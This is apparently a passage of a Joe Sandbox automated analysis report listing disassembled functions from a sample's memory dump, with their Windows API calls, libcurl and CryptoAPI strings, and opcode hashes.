                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: AddressCertHandleModuleNameProcString
                                    • String ID: 2.5.29.17$schannel: CertFindExtension() returned no extension.$schannel: CryptDecodeObjectEx() returned no alternate name information.$schannel: Empty DNS name.$schannel: Not enough memory to list all host names.$schannel: Null certificate context.$schannel: Null certificate info.
                                    • API String ID: 4138448956-2160583098
                                    • Opcode ID: 65ea9023f7e8557e9b134da75fa4d6b6b14ff4b681a4395cb649f6bfdf048c7c
                                    • Instruction ID: f4df936ca8435484287db9efd316fe9c90e40bd601ad70f4e6d23050b0896a9e
                                    • Opcode Fuzzy Hash: 65ea9023f7e8557e9b134da75fa4d6b6b14ff4b681a4395cb649f6bfdf048c7c
                                    • Instruction Fuzzy Hash: C1518D31A41305EECB25DFA4E841EEEBBF1EF58B14F209069E415FB282E7709941CB90
                                    Function 00E0E127 Relevance: 17.6, APIs: 2, Strings: 8, Instructions: 119COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: __aulldiv
                                    • String ID: %2I64d.%0I64dG$%2I64d.%0I64dM$%4I64dG$%4I64dM$%4I64dP$%4I64dT$%4I64dk$%5I64d
                                    • API String ID: 3732870572-2102732564
                                    • Opcode ID: 2a1bd69c082a95f4862eee43d39940ed6eab67eda313760918d4cf60720ca360
                                    • Instruction ID: a3c0e0d7017ce000314cd02d229785d171d378abf0b58aa29697882dee7db881
                                    • Opcode Fuzzy Hash: 2a1bd69c082a95f4862eee43d39940ed6eab67eda313760918d4cf60720ca360
                                    • Instruction Fuzzy Hash: ED31C4B3E4662535E53814199C4AEAB545FC792B68F1A7D36FC15B33D394B058D080E2
                                    Function 00E225B8 Relevance: 14.4, Strings: 11, Instructions: 633COMMON
                                    Download Yara Rule
                                    Strings
                                    • Server doesn't support multiplex (yet), xrefs: 00E226D2
                                    • Could multiplex, but not asked to, xrefs: 00E226FA
                                    • can multiplex, xrefs: 00E22675, 00E2267D
                                    • Can not multiplex, even if we wanted to, xrefs: 00E22712
                                    • Multiplexed connection found, xrefs: 00E22DD7
                                    • Server doesn't support multiplex yet, wait, xrefs: 00E226A6
                                    • serially, xrefs: 00E22670
                                    • Connection #%ld isn't open enough, can't reuse, xrefs: 00E227D4
                                    • Found pending candidate for reuse and CURLOPT_PIPEWAIT is set, xrefs: 00E22E09
                                    • Found bundle for host: %p [%s], xrefs: 00E2267F
                                    • Connection #%ld is still name resolving, can't reuse, xrefs: 00E227B4
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Can not multiplex, even if we wanted to$Connection #%ld is still name resolving, can't reuse$Connection #%ld isn't open enough, can't reuse$Could multiplex, but not asked to$Found bundle for host: %p [%s]$Found pending candidate for reuse and CURLOPT_PIPEWAIT is set$Multiplexed connection found$Server doesn't support multiplex (yet)$Server doesn't support multiplex yet, wait$can multiplex$serially
                                    • API String ID: 0-1297456373
                                    • Opcode ID: d30cb1072070b5121b2f0bbf6be3397cc4b731fdd989d4ea63ef1eababe3fc3e
                                    • Instruction ID: 647f195b998873936df3e18058e65d81642d35121bed6df5a88b4a5401c762ab
                                    • Opcode Fuzzy Hash: d30cb1072070b5121b2f0bbf6be3397cc4b731fdd989d4ea63ef1eababe3fc3e
                                    • Instruction Fuzzy Hash: FA32F730A08791ABDF35CF34A5917FA7BA26F52308F1CA4AEDA857B242D7319C85C711
                                    Function 00E38490 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 129networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E384DB
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3854E
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E38580
                                    • bind.WS2_32(?,00000030,?), ref: 00E385FC
                                    • WSAGetLastError.WS2_32 ref: 00E38607
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: calloc$ErrorLastbind
                                    • String ID: bind() failed; %s
                                    • API String ID: 2604820300-1141498939
                                    • Opcode ID: 305dcff777804ec43983c8f10ffe3633d6035215952450c52689f435c19d0d6e
                                    • Instruction ID: 160fef9c49cb1a8f4667794363353919d6b31631e26c44b20b03e3ad26c5f9f6
                                    • Opcode Fuzzy Hash: 305dcff777804ec43983c8f10ffe3633d6035215952450c52689f435c19d0d6e
                                    • Instruction Fuzzy Hash: 7D51C274A04705AFDB18CF24DD597E9BBE0FF04310F1451A9E809AB292DBB0AD84CF90
                                    Function 00E46591 Relevance: 10.6, APIs: 7, Instructions: 78encryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000040), ref: 00E465D2
                                    • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 00E465EC
                                    • CryptHashData.ADVAPI32(?,?,?,00000000), ref: 00E465FD
                                    • CryptGetHashParam.ADVAPI32(?,00000004,?,00000004,00000000,?,?,00000000), ref: 00E46616
                                    • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,?,00000000), ref: 00E46633
                                    • CryptDestroyHash.ADVAPI32(00000000), ref: 00E46642
                                    • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00E46653
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: Crypt$Hash$ContextParam$AcquireCreateDataDestroyRelease
                                    • String ID:
                                    • API String ID: 3606780921-0
                                    • Opcode ID: 38d85d5bfdd9f1dadba1f9df6dd38595ce52ce5e7e79bfb82443120aaa01f06f
                                    • Instruction ID: ec0dc9461f910cb483854c182a22fcb198743ad19f01033a17007aca7b6aca49
                                    • Opcode Fuzzy Hash: 38d85d5bfdd9f1dadba1f9df6dd38595ce52ce5e7e79bfb82443120aaa01f06f
                                    • Instruction Fuzzy Hash: 2F21E971A40208BFEB209F95DC4AF9EBBB9EB04705F5044A5B604F60E0D7709A48DBA5
                                    Function 00E4F860 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37encryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CryptGetHashParam.ADVAPI32(?,00000002,00000000,00000000,00000000,?,00000000,?,?,00E4F8EB,?,?,?,?,00E49C33,00000000), ref: 00E4F879
                                    • CryptGetHashParam.ADVAPI32(?,00000002,?,00000020,00000000,?,?,00E4F8EB,?,?,?,?,00E49C33,00000000,?), ref: 00E4F892
                                    • CryptDestroyHash.ADVAPI32(?,?,?,00E4F8EB,?,?,?,?,00E49C33,00000000,?), ref: 00E4F8A0
                                    • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,00E4F8EB,?,?,?,?,00E49C33,00000000,?), ref: 00E4F8AD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: Crypt$Hash$Param$ContextDestroyRelease
                                    • String ID:
                                    • API String ID: 2110207923-3916222277
                                    • Opcode ID: c3baf42c08db638495296f7cccc0138a98a814b0c5ca7b05cce1995ca9f854ee
                                    • Instruction ID: fbab3fac1e7b7c9b408887740af9e3820eacd4e94a16d0d01e7087285cd63d06
                                    • Opcode Fuzzy Hash: c3baf42c08db638495296f7cccc0138a98a814b0c5ca7b05cce1995ca9f854ee
                                    • Instruction Fuzzy Hash: FAF04936400608FFDB358F42ED09D9BBBBAEF85B06B508428F545A6060D3316E44EB90
                                    Function 00E0310D Relevance: 7.6, APIs: 5, Instructions: 59processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateToolhelp32Snapshot.API-MS-WIN-CORE-TOOLHELP-L1-1-0(00000008,00000000), ref: 00E03148
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00E03155
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 00E0316F
                                    • Module32First.API-MS-WIN-CORE-KERNEL32-LEGACY-L1-1-2(00000000,00000224), ref: 00E0318D
                                    • Module32Next.API-MS-WIN-CORE-KERNEL32-LEGACY-L1-1-2(00000000,00000224), ref: 00E031B2
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: Module32$CloseCreateErrorFirstHandleLastNextSnapshotToolhelp32
                                    • String ID:
                                    • API String ID: 3822340588-0
                                    • Opcode ID: 00c81ca6ec1313f91cc5465e7fde1bb815ae32e2091b25d7cfea4b68d80b2836
                                    • Instruction ID: c3141c04ce3cf55a52d88966cc8b776b371bfb8f347853f5d21f968e7c273419
                                    • Opcode Fuzzy Hash: 00c81ca6ec1313f91cc5465e7fde1bb815ae32e2091b25d7cfea4b68d80b2836
                                    • Instruction Fuzzy Hash: 421136316026046BD720ABB6AC4CBEF76AD9B89325F101664F801F31D0DF708EC98650
                                    Function 00E277F7 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 84COMMON
                                    Download Yara Rule
                                    APIs
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E27864
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E278B8
                                    Strings
                                    • -----END PUBLIC KEY-----, xrefs: 00E27839
                                    • -----BEGIN PUBLIC KEY-----, xrefs: 00E27811
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: freemalloc
                                    • String ID: -----END PUBLIC KEY-----$-----BEGIN PUBLIC KEY-----
                                    • API String ID: 3061335427-1157147699
                                    • Opcode ID: f269dd5d847fc0ed8b46fdf99028ea902552c967eea31c7493cb429f776aed03
                                    • Instruction ID: bd8d03e0dd3ec2beffe4a340292e03962c72c7c1c3f5f9c2b39ec1a414e87356
                                    • Opcode Fuzzy Hash: f269dd5d847fc0ed8b46fdf99028ea902552c967eea31c7493cb429f776aed03
                                    • Instruction Fuzzy Hash: 94213A32B08735ABDB1D9BA8B84D76D7BE5DB45390F24506AD481F7280DA709D04C7A0
                                    Function 00E5155B Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                    Download Yara Rule
                                    APIs
                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00E51567
                                    • IsDebuggerPresent.KERNEL32 ref: 00E51633
                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00E51653
                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 00E5165D
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                    • String ID:
                                    • API String ID: 254469556-0
                                    • Opcode ID: 2981e4e3562479253ce3a46288489d076cdd25bede112d268ce25d2bf84fdfdf
                                    • Instruction ID: 8bace169bd3459def2370875e2b3df1e565ab9a60c4d92008828b63b1f0dfc35
                                    • Opcode Fuzzy Hash: 2981e4e3562479253ce3a46288489d076cdd25bede112d268ce25d2bf84fdfdf
                                    • Instruction Fuzzy Hash: A4313A75D013189BDB10DF64D989BCDBBF8AF08305F1044DAE50DAB290EB715A88CF45
                                    Function 00E1A9B3 Relevance: 6.1, APIs: 2, Strings: 1, Instructions: 1557COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: xk
                                    • API String ID: 0-2543109834
                                    • Opcode ID: 3b3d99b0c07dbdc15b0fac2166853528cfd7d57c355b7962b66f812c0b4fcd89
                                    • Instruction ID: 75344518be0c60230cd4810b0ae3f16b672ad78bac3920af52791ee082bc83dc
                                    • Opcode Fuzzy Hash: 3b3d99b0c07dbdc15b0fac2166853528cfd7d57c355b7962b66f812c0b4fcd89
                                    • Instruction Fuzzy Hash: 99D26A74606201DFCB15CF68C5846E83BA1AF46354F2CA1B6EC1AEF75AD33099C4DB62
                                    Function 00E4C750 Relevance: 6.0, APIs: 4, Instructions: 37encryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CryptGetHashParam.ADVAPI32(?,00000002,00000000,?,00000000), ref: 00E4C769
                                    • CryptGetHashParam.ADVAPI32(00000010,00000002,?,00000010,00000000), ref: 00E4C782
                                    • CryptDestroyHash.ADVAPI32(00000010), ref: 00E4C790
                                    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00E4C79D
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: Crypt$Hash$Param$ContextDestroyRelease
                                    • String ID:
                                    • API String ID: 2110207923-0
                                    • Opcode ID: eade227f1ed808200863a97960e14d32d2797299d30dd6294bc445f7511f35d6
                                    • Instruction ID: 10746ea5f86ec130590d2aac17f9d93f5a1efe87f6cebb94738e2b94920c3a67
                                    • Opcode Fuzzy Hash: eade227f1ed808200863a97960e14d32d2797299d30dd6294bc445f7511f35d6
                                    • Instruction Fuzzy Hash: B0F04F36401604FFDB214F56DD09C9BBBB9EB81B02B504419F545A2060D3315E04DB50
                                    Function 00E1D8C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: ErrorLastrecv
                                    • String ID: Recv failure: %s
                                    • API String ID: 2514157807-4276829032
                                    • Opcode ID: be8300594176099364acfa406e0167482db6d913170b8e178aa7fb6f767f2d95
                                    • Instruction ID: 79dcd5847f7aff02888156b178453a4f673589b7dabddf7804cb8da8493e30df
                                    • Opcode Fuzzy Hash: be8300594176099364acfa406e0167482db6d913170b8e178aa7fb6f767f2d95
                                    • Instruction Fuzzy Hash: 4711D371A042089FCB109F25EC45BEAB7F5FF88321F100569F915B7291D7B0A9C48B50
                                    Function 00E46400 Relevance: 4.5, APIs: 3, Instructions: 37encryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000040), ref: 00E46417
                                    • CryptGenRandom.ADVAPI32(?,?,?), ref: 00E46430
                                    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00E46445
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: Crypt$Context$AcquireRandomRelease
                                    • String ID:
                                    • API String ID: 1815803762-0
                                    • Opcode ID: 4377b0fe864a4cb6ab153d21d25503f800b7ec7bbdb2468c2f6288781bb698d8
                                    • Instruction ID: d7eaa8647997a2021024e0d9448b6fbb9950af773acf2fa262055d06a965ddef
                                    • Opcode Fuzzy Hash: 4377b0fe864a4cb6ab153d21d25503f800b7ec7bbdb2468c2f6288781bb698d8
                                    • Instruction Fuzzy Hash: 62F05E72600254BBDF308B57ED1AFDF7E79EB85B51F104414F615F6060D6709A00E762
                                    Function 00E4C6E0 Relevance: 4.5, APIs: 3, Instructions: 35encryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000040,00000000,766B0130,?,00E4C800,00000000), ref: 00E4C6F4
                                    • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000004,?,00E4C800,00000000), ref: 00E4C710
                                    • CryptReleaseContext.ADVAPI32(00000000,00000000,?,00E4C800,00000000), ref: 00E4C71D
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: Crypt$Context$AcquireCreateHashRelease
                                    • String ID:
                                    • API String ID: 4045725610-0
                                    • Opcode ID: a293497aa410df5b3369d845d8324aef6e9201eb4940f053f783f9c8f2932512
                                    • Instruction ID: 0be8f47cd71d0a77394358738d5ecfec866fd3987cdf44e8feaba0cf8eac8503
                                    • Opcode Fuzzy Hash: a293497aa410df5b3369d845d8324aef6e9201eb4940f053f783f9c8f2932512
                                    • Instruction Fuzzy Hash: 6BF03032201244BBE6B04B63EC0CE977FACEBC5F91B604429F645F60A0E761A5049AA4
                                    Function 00E4F820 Relevance: 3.0, APIs: 2, Instructions: 26encryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000040,?,?,?,00E4F8CD,?,00000000,?,00000000,?,?,00E49C33), ref: 00E4F834
                                    • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?,?,00E4F8CD,?,00000000,?,00000000,?,?,00E49C33,?), ref: 00E4F84B
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: Crypt$AcquireContextCreateHash
                                    • String ID:
                                    • API String ID: 1914063823-0
                                    • Opcode ID: ab96de9be4fab4168ff60d826aa4ee1d31566b02b0acc3898b3bdd3cf0be8596
                                    • Instruction ID: 8de6645b278875bbce7d93afb0bf4c8cf5291838f53aa7efe97aa77426be1280
                                    • Opcode Fuzzy Hash: ab96de9be4fab4168ff60d826aa4ee1d31566b02b0acc3898b3bdd3cf0be8596
                                    • Instruction Fuzzy Hash: 5DE08C32200694BFE7305A63EC08E877FACEBC6F61B004429FA08E6090CA20A504C7B4
                                    Function 00E5137A Relevance: 1.6, APIs: 1, Instructions: 144COMMON
                                    Download Yara Rule
                                    APIs
                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00E51390
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: FeaturePresentProcessor
                                    • String ID:
                                    • API String ID: 2325560087-0
                                    • Opcode ID: 20c835b01008726be8dd4f640d4220dd8a6d9bc02bc7ad8d559c5722a1c49e11
                                    • Instruction ID: c1aa00a47ff1655348d5559b30ce7718366a493d54eb1501d0571a1f1677c8e7
                                    • Opcode Fuzzy Hash: 20c835b01008726be8dd4f640d4220dd8a6d9bc02bc7ad8d559c5722a1c49e11
                                    • Instruction Fuzzy Hash: D75158B1A002058FDB15CF5AE8917AEBBF1FB48355F1498BAC815FB251E3B49948CF60
                                    Function 00E4C730 Relevance: 1.5, APIs: 1, Instructions: 10encryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CryptHashData.ADVAPI32(?,00000000,00E49C33,00000000,?,00E4F8E1,?,?,00E49C33,00000000,?,00000000,?,?,00E49C33,?), ref: 00E4C741
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: CryptDataHash
                                    • String ID:
                                    • API String ID: 4245837645-0
                                    • Opcode ID: b0fc5a544a67f241d0388d02f82735fee0c2f6fbff4d75e53ed5b56293fc5d72
                                    • Instruction ID: 63d76d86be6ebdb5016f871731663418724ea7b55885eb2cda971db84eed404d
